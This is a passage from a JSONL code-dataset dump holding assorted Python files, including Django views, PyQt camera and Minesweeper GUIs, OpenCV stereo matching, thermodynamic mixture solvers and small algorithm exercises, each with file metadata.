file_name in files:\n\n\tif '.py' in file_name:\n\t\tcontinue\n\n\n\tcontains_path = 'Contains/'\n\n\tinput_file = file_name\n\tprint(input_file)\n\toutput_path = 'parsed/'\n\tinput_string = re.sub('\\.csv$', '', input_file)\n\n\treader = csv.reader(open(input_file, 'r', newline = ''), quotechar = '\"', delimiter = ',', quoting = csv.QUOTE_ALL, skipinitialspace = True)\n\twriter_see_hear = open(contains_path + input_string + \" SEE HEAR\" + \".csv\", \"w+\")\n\twriter_see = open(output_path + input_string + \" SEE\" + \".csv\", \"w+\")\n\twriter_hear = open(output_path + input_string + \" HEAR\" + \".csv\", \"w+\")\n\twriter_neither = open(output_path + input_string + \" NEITHER\" + \".csv\", \"w+\")\n\tcsv_writer_see_hear = csv.writer(writer_see_hear)\n\tcsv_writer_see = csv.writer(writer_see)\n\tcsv_writer_hear = csv.writer(writer_hear)\n\tcsv_writer_neither = csv.writer(writer_neither)\n\n\n\theader = next(reader)\n\n\tcsv_writer_see_hear.writerow(header)\n\tcsv_writer_see.writerow(header)\n\tcsv_writer_hear.writerow(header)\n\tcsv_writer_neither.writerow(header)\n\n\tfor row in reader:\n\t\tif row[35] == '1':\n\t\t\tcsv_writer_see_hear.writerow(row)\n\t\telif row[35] == '0':\n\t\t\tcsv_writer_neither.writerow(row)\n\t\telif row[35] == '-2':\n\t\t\tcsv_writer_hear.writerow(row)\n\t\telif row[35] == '-1':\n\t\t\tcsv_writer_see.writerow(row)\n\n","sub_path":"scripts/temporal-see-hear.py","file_name":"temporal-see-hear.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"203059720","text":"#!/usr/bin/python3\n\nfrom math import gcd\n\nn, m, k = [int(x) for x in input().split(' ')]\n\nans = 0\n\nmu = [0, 1, -1, -1, 0, -1, 1, -1, 0, 0, 1, -1, 0, -1, 1]\n\nfor d in range(1, m + 1):\n for j in range(d, m, d):\n if gcd(k, j) == 1:\n ans += mu[d] * (n // d)\n\nprint(ans)","sub_path":"Online Judges/LOJ/LOJ 2085 「NOI2016」循环之美/2085.py","file_name":"2085.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"547372664","text":"# coding: utf8\nfrom django.urls import path\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom .views import LocationListView, LocationCreateView, LocationUpdateView, LocationDeleteView, StationListView, StationCreateView, StationUpdateView, StationDeleteView\n\nurlpatterns_locations = ([\n\n path('', login_required(LocationListView.as_view()), name='list'),\n path('create', login_required(LocationCreateView.as_view()), name='create'),\n path('update//', login_required(LocationUpdateView.as_view()), name='update'),\n path('delete//', login_required(LocationDeleteView.as_view()), name='delete'),\n\n], 'locations')\n\nurlpatterns_stations = ([\n\n path('', login_required(StationListView.as_view()), name='list'),\n path('create', login_required(StationCreateView.as_view()), name='create'),\n path('update//', login_required(StationUpdateView.as_view()), name='update'),\n path('delete//', login_required(StationDeleteView.as_view()), name='delete'),\n\n], 'stations')","sub_path":"apps/stations/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"1833209","text":"import numpy as np\n\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.datasets import load_iris\n\nfrom pure_sklearn.map import convert_estimator\nfrom pure_sklearn.utils import shape\n\nMAX_ITER = 1000\nTOL = 1e-3\nMETHODS = [\"decision_function\", \"predict\", \"_predict_proba_lr\"]\n\n\ndef test_perceptron():\n X, y = load_iris(return_X_y=True)\n X_ = X.tolist()\n for y_ in [y, (y == 0).astype(int), (y == 2).astype(int)]:\n for fit_intercept in [True, False]:\n clf = Perceptron(fit_intercept=fit_intercept, max_iter=MAX_ITER, tol=TOL)\n clf.fit(X, y_)\n clf_ = convert_estimator(clf)\n\n for method in METHODS:\n scores = getattr(clf, method)(X)\n scores_ = getattr(clf_, method)(X_)\n assert np.allclose(scores.shape, shape(scores_))\n assert np.allclose(scores, scores_)\n","sub_path":"pure_sklearn/linear_model/tests/test_perceptron.py","file_name":"test_perceptron.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"522736841","text":"from PyQt5 import QtWidgets\nfrom PyQt5 import QtCore\n\nimport os\nimport cv2\n\nfrom src.vision.reconstruction.use_cases.reconstruction_from_video import ReconstructionFromVideo\nfrom src.vision.reconstruction.use_cases.reconstruction_from_images import ReconstructionFromImages\nfrom src.vision.calibration.use_cases.CalibrateStereoCamerasFromChessboard import CalibrateStereoCamerasFromChessboard\nfrom src.vision.reconstruction.use_cases.reconstruction_cameras_from_calibration import RecontructCameras\n\nfrom src.vision.presentation.user_interface.partials.calibration_information import CalibrationInformation\nfrom src.vision.presentation.user_interface.partials.reconstruction_information import ReconstructionInformation\n\n\nclass Actions(QtWidgets.QTabWidget):\n take_calibration_images = False\n calibration_images_taken = 0\n frames_between_calibration_images = 0\n\n def __init__(self, parent=None):\n super(QtWidgets.QTabWidget, self).__init__(parent)\n self.parent = parent\n\n self.resize(325, 525)\n self.move(920, 100)\n\n self.addTab(self.create_calibration_widget(), 'Calibration')\n self.addTab(self.create_reconstruction_widget(), 'Reconstruction')\n\n def create_calibration_widget(self):\n self.calibration_actions = QtWidgets.QGroupBox('Actions')\n self.calibration_actions_layout = QtWidgets.QVBoxLayout()\n self.calibration_actions_layout.setAlignment(QtCore.Qt.AlignTop)\n self.calibration_actions_layout.addWidget(self.create_calibration_images_button())\n self.calibration_actions_layout.addWidget(self.create_calibrate_cameras_button())\n self.calibration_actions_layout.addWidget(self.create_build_cameras_button())\n\n self.calibration_actions.setLayout(self.calibration_actions_layout)\n\n self.calibration_information = CalibrationInformation()\n\n self.calibration_widget = QtWidgets.QWidget()\n self.calibration_widget_layout = QtWidgets.QVBoxLayout()\n self.calibration_widget_layout.addWidget(self.calibration_actions)\n self.calibration_widget_layout.addWidget(self.calibration_information)\n\n self.calibration_widget.setLayout(self.calibration_widget_layout)\n\n return self.calibration_widget\n\n def create_reconstruction_widget(self):\n reconstruction_actions = QtWidgets.QGroupBox('Actions')\n reconstruction_actions_layout = QtWidgets.QVBoxLayout()\n reconstruction_actions_layout.setAlignment(QtCore.Qt.AlignTop)\n reconstruction_actions_layout.addWidget(self.create_take_photo_button())\n reconstruction_actions_layout.addWidget(self.create_video_record_button())\n reconstruction_actions_layout.addWidget(self.create_reconstruction_button())\n reconstruction_actions_layout.addWidget(self.create_reconstruction_from_video_button())\n\n self.reconstruction_information = ReconstructionInformation()\n\n reconstruction_actions.setLayout(reconstruction_actions_layout)\n reconstruction_actions_widget = QtWidgets.QWidget()\n reconstruction_widget_layout = QtWidgets.QVBoxLayout()\n reconstruction_widget_layout.addWidget(reconstruction_actions)\n reconstruction_widget_layout.addWidget(self.reconstruction_information)\n\n reconstruction_actions_widget.setLayout(reconstruction_widget_layout)\n\n return reconstruction_actions_widget\n\n def create_calibrate_cameras_button(self):\n calibrate_button = QtWidgets.QPushButton('Calibrate Cameras', self)\n calibrate_button.resize(150, 40)\n calibrate_button.clicked.connect(self.calibrate_set)\n\n return calibrate_button\n\n def create_calibration_images_button(self):\n take_calibration_images = QtWidgets.QPushButton('Get Calibration Set', self)\n take_calibration_images.setCheckable(True)\n take_calibration_images.resize(150, 40)\n\n take_calibration_images.clicked.connect(self.toggle_take_calibration_images)\n\n return take_calibration_images\n\n def create_build_cameras_button(self):\n build_cameras_button = QtWidgets.QPushButton('Show Cameras', self)\n build_cameras_button.resize(150, 40)\n build_cameras_button.clicked.connect(self.show_cameras)\n\n return build_cameras_button\n\n def calibrate_set(self):\n stereo_calibrator = CalibrateStereoCamerasFromChessboard()\n stereo_calibrator.execute(self.parent.combobox_selector.currentText())\n\n def show_cameras(self):\n calibration_file = self.parent.configuration.general_configuration.sets_folder + self.parent.combobox_selector.currentText() + '/calibrated_camera.yml'\n reconstructor = RecontructCameras(calibration_file)\n reconstructor.run()\n\n def toggle_take_calibration_images(self):\n self.calibration_images_taken = 0\n self.take_calibration_images = not self.take_calibration_images\n\n def should_take_calibration_images(self):\n return self.take_calibration_images\n\n def create_reconstruction_button(self):\n reconstruction = QtWidgets.QWidget()\n reconstruction_layout = QtWidgets.QHBoxLayout()\n reconstruction_layout.setContentsMargins(0, 0, 0, 0)\n\n reconstruction_button = QtWidgets.QPushButton('Rec. Image', self)\n reconstruction_button.clicked.connect(self.reconstruct_from_images)\n images = [str(number) for number in range(6)]\n self.reconstruction_image_selector = QtWidgets.QComboBox(self)\n self.reconstruction_image_selector.addItems(images)\n\n reconstruction_layout.addWidget(reconstruction_button)\n reconstruction_layout.addWidget(self.reconstruction_image_selector)\n reconstruction.setLayout(reconstruction_layout)\n\n return reconstruction\n\n def create_reconstruction_from_video_button(self):\n reconstruction_button = QtWidgets.QPushButton('Rec. Video', self)\n reconstruction_button.move(1090, 200)\n reconstruction_button.resize(150, 40)\n reconstruction_button.clicked.connect(self.reconstruct_from_video)\n\n return reconstruction_button\n\n def create_take_photo_button(self):\n take_photo_button = QtWidgets.QPushButton('Take Photo', self)\n take_photo_button.move(925, 150)\n take_photo_button.resize(150, 40)\n take_photo_button.clicked.connect(self.take_photo)\n\n return take_photo_button\n\n def create_video_record_button(self):\n record_video_button = QtWidgets.QPushButton('Record Video', self)\n record_video_button.setCheckable(True)\n record_video_button.move(1090, 150)\n record_video_button.resize(150, 40)\n record_video_button.clicked.connect(self.record_video)\n\n return record_video_button\n\n def take_calibration_image(self):\n self.frames_between_calibration_images += 1\n if self.frames_between_calibration_images == 100:\n if not os.path.exists('bin/sets/' + self.parent.combobox_selector.currentText() + '/calibration_images'):\n os.makedirs('bin/sets/' + self.parent.combobox_selector.currentText() + '/calibration_images')\n\n\n print('Take Dual Image ' + str(self.calibration_images_taken))\n\n print('::Write Left Image::')\n im_left = self.parent.cameras[0].get_image_hd()\n cv2.imwrite('bin/sets/' + self.parent.combobox_selector.currentText() + '/calibration_images/left_image_' + str(self.calibration_images_taken) + '.png',\n im_left)\n\n print('::Write Right Image::')\n im_right = self.parent.cameras[1].get_image_hd()\n cv2.imwrite('bin/sets/' + self.parent.combobox_selector.currentText() + '/calibration_images/right_image_' + str(self.calibration_images_taken) + '.png',\n im_right)\n self.frames_between_calibration_images = 0\n self.update_calibration_images_amount()\n\n def update_calibration_images_amount(self):\n self.calibration_images_taken += 1\n self.calibration_information.set_calibration_images_taken(self.calibration_images_taken)\n\n def record_video(self):\n if not os.path.exists('bin/Videos/' + self.textbox.text() + '_video'):\n os.makedirs('bin/Videos/' + self.textbox.text() + '_video')\n\n if self.video_recorder_1 is None:\n print('->Create video recorder<-')\n self.video_recorder_1 = cv2.VideoWriter(\n 'bin/Videos/' + self.textbox.text() + '_video/video_1.avi',\n cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'),\n 10,\n (1280, 720)\n )\n\n self.video_recorder_2 = cv2.VideoWriter(\n 'bin/Videos/' + self.textbox.text() + '_video/video_2.avi',\n cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'),\n 10,\n (1280, 720)\n )\n\n if self.record_video_button.isChecked() is False:\n self.video_recorder_1.release()\n self.video_recorder_2.release()\n\n self.video_recorder_1 = None\n self.video_recorder_2 = None\n\n self.should_record_video = self.record_video_button.isChecked()\n\n def take_photo(self):\n if not os.path.exists('bin/sets/' + self.parent.combobox_selector.currentText()):\n os.makedirs('bin/sets/' + self.parent.combobox_selector.currentText())\n\n if not os.path.exists('bin/sets/' + self.parent.combobox_selector.currentText() + '/images'):\n os.makedirs('bin/sets/' + self.parent.combobox_selector.currentText() + '/images')\n\n #self.photos_taken += 1\n #print('Take Dual Image ' + str(self.photos_taken))\n\n print('::Write Left Image::')\n im_left = self.parent.cameras[0].get_image_hd()\n # im_rgb_left = cv2.cvtColor(cv2.resize(im_left,(1280,720)), cv2.COLOR_BGR2RGB)\n cv2.imwrite('bin/sets/' + self.parent.combobox_selector.currentText() + '/images/left_image_2.png', im_left)\n\n print('::Write Right Image::')\n im_right = self.parent.cameras[1].get_image_hd()\n # im_rgb_right = cv2.cvtColor(cv2.resize(im_right,(1280,720)), cv2.COLOR_BGR2RGB)\n cv2.imwrite('bin/sets/' + self.parent.combobox_selector.currentText() + '/images/right_image_2.png', im_right)\n\n self.images_counter.setNum(self.photos_taken)\n\n def reconstruct_from_video(self):\n video_reconstructor = ReconstructionFromVideo(\n 'bin/sets/' + self.parent.combobox_selector.currentText() + '/videos/video_1.avi',\n 'bin/sets/' + self.parent.combobox_selector.currentText() + '/videos/video_2.avi',\n 'bin/sets/' + self.parent.combobox_selector.currentText() + '/calibrated_camera.yml'\n )\n video_reconstructor.run()\n\n def reconstruct_from_images(self):\n images_reconstructor = ReconstructionFromImages(\n 'bin/sets/' + self.parent.combobox_selector.currentText() + '/images/left_image_' + self.reconstruction_image_selector.currentText() + '.png',\n 'bin/sets/' + self.parent.combobox_selector.currentText() + '/images/right_image_' + self.reconstruction_image_selector.currentText() + '.png',\n 'bin/sets/' + self.parent.combobox_selector.currentText() + '/calibrated_camera.yml',\n 'bin/sets/' + self.parent.combobox_selector.currentText() + '/camera_A_calibration.yml',\n 'bin/sets/' + self.parent.combobox_selector.currentText() + '/camera_B_calibration.yml',\n self\n )\n images_reconstructor.run()\n","sub_path":"code/src/vision/presentation/user_interface/partials/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":11488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"9058997","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg1 = cv2.imread('left.jpg',0) #queryimage # left image\nimg2 = cv2.imread('right.jpg',0) #trainimage # right image\n\nsift = cv2.xfeatures2d.SIFT_create()\nsurf = cv2.xfeatures2d.SURF_create()\n\n# find the keypoints and descriptors with SIFT\nkp1, des1 = sift.detectAndCompute(img1,None)\nkp2, des2 = sift.detectAndCompute(img2,None)\n\n# FLANN parameters\nFLANN_INDEX_KDTREE = 0\nindex_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\nsearch_params = dict(checks=50)\n\nflann = cv2.FlannBasedMatcher(index_params,search_params)\nmatches = flann.knnMatch(des1,des2,k=2)\n\ngood = []\npts1 = []\npts2 = []\n\n# ratio test as per Lowe's paper\nfor i,(m,n) in enumerate(matches):\n if m.distance < 0.8*n.distance:\n good.append(m)\n pts2.append(kp2[m.trainIdx].pt)\n pts1.append(kp1[m.queryIdx].pt)\n\n\npts1 = np.int32(pts1)\npts2 = np.int32(pts2)\n\nprint(pts1)\nprint(type(pts1))\n\nF, mask = cv2.findFundamentalMat(pts1,pts2,cv2.FM_LMEDS)\nprint(F)\n# We select only inlier points\npts1 = pts1[mask.ravel()==1]\npts2 = pts2[mask.ravel()==1]","sub_path":"HW2/epi_test.py","file_name":"epi_test.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"258505501","text":"import logging\nimport time\nfrom common.config import Config\nfrom common.globalmanager import GlobalManager\nimport os\n\nconfig = Config.getConfig()\nrq = time.strftime('%Y%m%d_%H%M', time.localtime()) + '.log'\nrootPath = GlobalManager().get_value('rootPath')\n\nclass Logger(object):\n\n def __init__(self, name):\n self.name = name\n self.logPath = config['log']['path']\n self.logger = logging.getLogger(self.name)\n self.logger.setLevel(logging.INFO)\n # self.streamHandler = logging.StreamHandler()\n self.fileHandler = logging.FileHandler(os.path.join(rootPath,self.logPath,rq), 'a',encoding='utf-8')\n self.formatter = logging.Formatter(config['log']['fmt'])\n # self.streamHandler.setLevel(logging.INFO)\n self.fileHandler.setLevel(logging.INFO)\n self.fileHandler.setFormatter(self.formatter)\n # self.streamHandler.setFormatter(self.formatter)\n # self.logger.addHandler(self.streamHandler)\n self.logger.addHandler(self.fileHandler)\n\n def getLogger(self):\n return self.logger","sub_path":"common/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"119581110","text":"from django.contrib import messages\nfrom django.contrib.auth.decorators import permission_required\nfrom django.shortcuts import render, redirect\nfrom products.models import Pc, Products, Pc_character\nfrom products.forms import pc_form, pcs_form\n\n\ndef database_pc(request):\n list_pc = Pc.objects.all()\n return render(request, 'pc/pc_view.html', {'lists': list_pc})\n\n\ndef detail_pc(request, id):\n item = Products.objects.get(id=id)\n item_pc = Pc_character.objects.all().filter(pcs__products__id=id)\n return render(request, 'pc/pc_detail.html', {'item': item, 'item_pc': item_pc})\n\n\n@permission_required('products.add_pc_character')\ndef create_pc(request):\n if request.method == 'POST':\n form = pc_form(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n img_obj = form.instance\n messages.info(request, 'Save data, go to pc.')\n return render(request, 'pc/pc_create.html', {'form': form, 'img_obj': img_obj})\n else:\n form = pc_form()\n return render(request, 'pc/pc_create.html', {'form': form})\n\n\n@permission_required('products.add_pc')\ndef create_pcs(request):\n if request.method == 'POST':\n form_p = pcs_form(request.POST, request.FILES)\n if form_p.is_valid():\n form_p.save()\n img_obj = form_p.instance\n messages.info(request, 'Save data, press the next button.')\n return render(request, 'pc/pcs_create.html', {'form_p': form_p, 'img_obj': img_obj})\n else:\n form_p = pcs_form()\n return render(request, 'pc/pcs_create.html', {'form_p': form_p})\n\n\n@permission_required('products.change_pc_character')\ndef update_pc(request, id):\n pc = Pc_character.objects.get(pcs__products_id=id)\n update_form = pc_form(request.POST or None, instance=pc)\n if update_form.is_valid():\n update_form.save()\n messages.info(request, 'update data to the pc.')\n return redirect('/products/update/pc/'+id)\n name_pc = Pc.objects.get(products_id=id)\n\n context = {\n 'update_form': update_form,\n 'name': name_pc\n }\n return render(request, 'pc/pc_update.html', context)\n\n\n@permission_required('products.delete_pc')\ndef delete_pc(request, id):\n pc_get = Pc.objects.get(id=id)\n if request.method == 'POST':\n pc_get.delete()\n messages.info(request, 'Delete data on the database.')\n return redirect('view_pc')\n return render(request, {'pc': pc_get})\n","sub_path":"products/views/views_pc.py","file_name":"views_pc.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"365894243","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.4 (3310)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/val/Projects/workon/mpro/doozdev/backend/restful-backend/apps/geoware/views/altname.py\n# Compiled at: 2017-01-27 09:53:00\n# Size of source mod 2**32: 574 bytes\nfrom dal import autocomplete\nfrom ..models import Altname\n\nclass AltnameAutocompleteView(autocomplete.Select2QuerySetView):\n __doc__ = '\\n Altname Autocomplete view.\\n '\n\n def get_queryset(self):\n if not self.request.user.is_authenticated():\n return Altname.objects.none()\n qs = Altname.objects.all()\n ref_geoname_id = self.forwarded.get('geoname_id', None)\n if ref_geoname_id:\n qs = qs.filter(ref_geoname_id=ref_geoname_id)\n if self.q:\n qs = qs.filter(name__istartswith=self.q)\n return qs","sub_path":"pycfiles/django-geoware-0.1.0.tar/altname.cpython-34.py","file_name":"altname.cpython-34.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"375314195","text":"#!/usr/bin/env python\n#title :trace-editor.py\n#description :process a trace disk\n#author :Vincentius Martin\n#date :-\n#version :0.1\n#usage :python trace-editor.py\n#notes :\n#python_version :2.7.5+\n#==============================================================================\n\nfrom random import randint\n\n# input: request list (list), modify the size x times (float)\ndef resize(reqlist, times):\n for request in reqlist:\n request[3] = ('%f' % (times * float(request[3]))).rstrip('0').rstrip('.')\n return reqlist\n\n# input: request list (list), modify the size x rate times (float)\ndef modifyRate(reqlist, rate):\n i = 0\n while i < len(reqlist):\n #if float(reqlist[i][0]) * rate > 300000:\n # del reqlist[i:len(reqlist)]\n # break\n reqlist[i][0] = '%.3f' % (rate * float(reqlist[i][0]))\n i += 1\n return reqlist\n\n#interval: in ms; size in KB\ndef insertIO(reqlist,size,interval,iotype):\n insert_time = interval\n maxoffset = int(max(reqlist, key=lambda x: int(x[2]))[2])\n i = 0\n while i < len(reqlist):\n if float(reqlist[i][0]) > insert_time: #7190528,7370752\n reqlist.insert(i,['%.3f' % insert_time,str(0),str(randint(0,maxoffset)),str(size * 2),str(iotype)])\n insert_time += interval\n i += 1\n i += 1\n return reqlist\n \ndef printRequestList(requestlist, filename):\n out = open(\"out/\" + filename + \"-modified.trace\" , 'w')\n for elm in requestlist:\n out.write(str(elm[0]) + \" \" + str(elm[1]) + \" \" + str(elm[2]) + \" \" + str(elm[3]) + \" \" + str(elm[4])+\"\\n\")\n out.close()\n\n","sub_path":"utils/iodaExp/traceExp/scripts/trace_modifier.py","file_name":"trace_modifier.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"567541296","text":"from plu_diffusion.ideal_binay_mixture_fixed_temperature import (GAS_MOLAR_FRACTION,\n LIQUID_MOLAR_FRACTION)\nfrom scipy.optimize import fsolve\n\nclass IdealBinaryMixtureFixedPressure(object):\n '''\n '''\n def __init__(self, component_one, component_two, pressure):\n self.components = [component_one, component_two]\n self.pressure = pressure\n \n \n def calculate_first_component_gas_molar_fraction(self, temperature):\n y1 = fsolve(\n self._gas_molar_fraction_residual_equation_from_temperature,\n 0.0,\n args=(temperature)\n ) \n return y1[0]\n \n\n def _gas_molar_fraction_residual_equation_from_temperature(\n self,\n component_one_gas_molar_fraction_guess,\n temperature,\n ): \n '''\n '''\n p = self.pressure\n T = temperature\n psat_1 = self.components[0].calculate_saturation_pressure(T)\n psat_2 = self.components[1].calculate_saturation_pressure(T)\n y_1 = component_one_gas_molar_fraction_guess\n y_2 = 1.0 - y_1\n x_1 = y_1 * (p / psat_1)\n x_2 = 1.0 - x_1\n \n residual = y_1 * p + y_2 * p - x_1 * psat_1 - x_2 * psat_2 \n return residual\n \n \n \n \n def calculate_saturation_temperature(\n self,\n component_one_molar_fraction,\n molar_fraction_type=GAS_MOLAR_FRACTION,\n ): \n '''\n '''\n temperature_guess = (\n self.components[0].calculate_saturation_temperature(self.pressure))\n residual_function = None\n if molar_fraction_type == GAS_MOLAR_FRACTION:\n residual_function = (\n self._temperature_equation_residual_with_gas_molar_fraction)\n elif molar_fraction_type == LIQUID_MOLAR_FRACTION:\n residual_function = (\n self._temperature_equation_residual_with_liquid_molar_fraction)\n saturation_pressure = fsolve(\n func=residual_function,\n x0=temperature_guess,\n args=(component_one_molar_fraction)\n )\n return saturation_pressure[0]\n \n def _temperature_equation_residual_with_gas_molar_fraction(\n self,\n temperature_guess,\n component_one_gas_molar_fraction,\n ): \n '''\n '''\n p = self.pressure\n T = temperature_guess\n psat_1 = self.components[0].calculate_saturation_pressure(T)\n psat_2 = self.components[1].calculate_saturation_pressure(T)\n y_1 = component_one_gas_molar_fraction\n y_2 = 1.0 - y_1\n x_1 = y_1 * (p / psat_1)\n x_2 = 1.0 - x_1\n \n residual = y_1 * p + y_2 * p - x_1 * psat_1 - x_2 * psat_2 \n return residual\n \n def _temperature_equation_residual_with_liquid_molar_fraction(\n self,\n temperature_guess,\n component_one_liquid_molar_fraction,\n ): \n '''\n '''\n p = self.pressure\n T = temperature_guess\n psat_1 = self.components[0].calculate_saturation_pressure(T)\n psat_2 = self.components[1].calculate_saturation_pressure(T)\n \n x_1 = component_one_liquid_molar_fraction\n x_2 = 1.0 - x_1\n y_1 = x_1 * (psat_1 / p)\n y_2 = 1.0 - y_1\n \n residual = y_1 * p + y_2 * p - x_1 * psat_1 - x_2 * psat_2 \n return residual\n","sub_path":"src/plu_diffusion/ideal_binay_mixture_fixed_pressure.py","file_name":"ideal_binay_mixture_fixed_pressure.py","file_ext":"py","file_size_in_byte":3371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"180230573","text":"intervals = [[1,2],[3,5],[6,7],[8,10],[12,16]]\nnewInterval = [4,8]\nclass Solution:\n def insert(self, intervals, newInterval):\n ans=[]\n for item in intervals:\n ans.append(item)\n while ans[-1]!=newInterval and ans[-1][0]<=newInterval[1] and ans[-1][1]>=newInterval[0]:\n temp=ans.pop()\n newInterval=[min(temp[0],newInterval[0]),max(temp[1],newInterval[1])]\n while ans[-1][0]==newInterval[0]:\n ans.pop()\n ans.append(newInterval)\n return ans\n # left, right = newInterval\n # placed = False\n # ans = list()\n # for li, ri in intervals:\n # if li > right:\n # # 在插入区间的右侧且无交集\n # if not placed:\n # ans.append([left, right])\n # placed = True\n # ans.append([li, ri])\n # elif ri < left:\n # # 在插入区间的左侧且无交集\n # ans.append([li, ri])\n # else:\n # # 与插入区间有交集,计算它们的并集\n # left = min(left, li)\n # right = max(right, ri)\n #\n # if not placed:\n # ans.append([left, right])\n # return ans\nx=Solution()\nprint(x.insert(intervals,newInterval))","sub_path":"57.py","file_name":"57.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"501851357","text":"\"\"\" Asal sayi olup olmadigini kontrol eden fonksiyon yazınız.\"\"\"\n\ndef asal_sayi(number):\n sayac=0\n for i in range(2,number):\n if number%i==0 :\n sayac+=1\n if sayac!=0:\n return \"sayi asal degildir\"\n return \"sayi asaldir\"\n\nprint(asal_sayi(24))\n\n\n","sub_path":"Asal Sayi fonksiyonu.py","file_name":"Asal Sayi fonksiyonu.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"316888854","text":"#\n# @lc app=leetcode.cn id=1 lang=python3\n#\n# [1] 两数之和\n#\n\n# @lc code=start\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n lens = len(nums)\n j=-1\n for i in range(1,lens):\n temp = nums[:i]\n if (target - nums[i]) in temp:\n j = temp.index(target - nums[i])\n break\n if j>=0:\n return [j,i]\n# @lc code=end\n\n","sub_path":".leetcode/1.两数之和.py","file_name":"1.两数之和.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"347670767","text":"\"\"\"Exercício 31:\nEntrar com um número e gerar Pi com o dado número de casas decimais. Coloque um limite de casas decimais!\n\"\"\"\n\nfrom decimal import getcontext, Decimal\n\n\ndef pi(digitos_desejados: int):\n i = 1 # contador de iterações\n\n # aumenta dois no tamanho pois deve contabilizar\n # o \"3\" do valor numérico e o fato de que o último\n # dígito sempre será uma aproximação\n tamanho = digitos_desejados + 2\n\n # define a precisão para o tamanho estipulado\n getcontext().prec = tamanho\n # retira o arredondamento do algoritmo, pois\n # o número já vem correto, não precisa ser arredondado\n getcontext().rounding = \"ROUND_FLOOR\"\n\n # >> Aqui começa o algoritmo de Gauss-Legendre <<\n # valores iniciais das quatro variáveis\n a0 = Decimal(1)\n b0 = Decimal(1 / Decimal(2).sqrt())\n t0 = Decimal(1 / 4)\n p0 = Decimal(1)\n\n # o número de dígitos corretos é igual ao número de iterações * 2\n # enquanto o tamanho estipulado é maior que o número de digitos corretos\n while i * 2 < tamanho:\n # define as variáveis com base nos valores iniciais OU anteriores\n a1 = Decimal((a0 + b0) / 2)\n b1 = Decimal(a0 * b0).sqrt()\n t1 = Decimal(t0 - p0 * ((a0 - a1) ** 2))\n p1 = Decimal(2 * p0)\n\n # redefine valores iniciais/anteriores com os novos\n a0 = a1\n b0 = b1\n t0 = t1\n p0 = p1\n\n i += 1\n\n # Pi é igual a fórmula definida\n pi = Decimal(((a1 + b1) ** 2) / (4 * t1))\n # como o último dígito está sempre aproximado, calculo 1 a mais do pedido\n # e retiro ele usando a função format()\n # dando n dígitos significativos\n return format(pi, f\".{tamanho - 1}g\")\n\n","sub_path":"Janeiro/031-Enésimo-Dígito-de-Pi.py","file_name":"031-Enésimo-Dígito-de-Pi.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"221520630","text":"from PySide2.QtWidgets import QFrame\nfrom PySide2.QtGui import QPainter, QPixmap\nfrom PySide2.QtCore import Qt, QRect, QPoint\n\nfrom game_controller import GameController\n\n\nclass Playground(QFrame):\n def __init__(self, controller):\n QFrame.__init__(self)\n self.game = controller\n self.mine_image = QPixmap(\"images/mine.png\")\n self.mine_red_image = QPixmap(\"images/mine_red.png\")\n self.flag_image = QPixmap(\"images/flag.png\")\n self.cell_raised_image = QPixmap(\"images/cell_raised.png\")\n\n controller.gameReset.connect(self.repaint)\n self.reset()\n\n def paintEvent(self, paintEvent):\n # let QFrame to draw its background first\n QFrame.paintEvent(self, paintEvent)\n # init painter to start drawing on current widget surface\n painter = QPainter(self)\n # translate is mandatory since frame has a bevel\n painter.translate(self.lineWidth(), self.lineWidth())\n # render cells\n for i in range(GameController.CELL_COUNT):\n for j in range(GameController.CELL_COUNT):\n cell_size = GameController.CELL_SIZE\n rect = QRect(i*cell_size, j*cell_size, cell_size, cell_size)\n self._draw_cell(painter, rect, self.game.cells[i][j])\n\n def mousePressEvent(self, mouseEvent):\n # first check whether the click position is on\n # the bevel and not a cell and ignore it in that case\n if self._clicked_on_bevel(mouseEvent.pos()):\n print(\"clicked on bevel\")\n return\n # adjust position by bevel size\n pos = 